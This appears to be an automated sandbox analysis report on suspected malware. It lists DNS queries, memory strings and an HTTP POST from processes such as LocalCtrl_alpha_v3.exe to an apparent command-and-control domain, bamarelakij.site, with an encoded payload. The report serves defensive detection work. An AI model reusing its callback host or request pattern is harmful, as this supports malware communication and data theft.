trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: BGlQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global 
trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: bamarelakij.site
Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
Source: global traffic | DNS traffic detected: DNS query: c.msn.com
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: global traffic | DNS traffic detected: DNS query: assets2.msn.com
Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: unknown | HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  Content-Length: 147
  Host: bamarelakij.site
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.es/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.fr/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.it/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.jp/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.kr/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.net/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.pl/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.ru/
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.6
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: RescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: RescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2504789916.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0196AA96
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.e2a54c2fbad598371348.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2504789916.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2529776416.0000000008000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2253730305.000000000051B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bamarelakij.site/roi
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2223556230.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bamarelakij.site/roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.google/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.levonet.sk/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query%
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query%
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r1&FrontEnd=AFD
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2529776416.0000000008000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tLast-Modified:
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.000000000803B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000803A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Expose-Headers:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.0000000008163000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-control:public
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000803A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-controlpublic
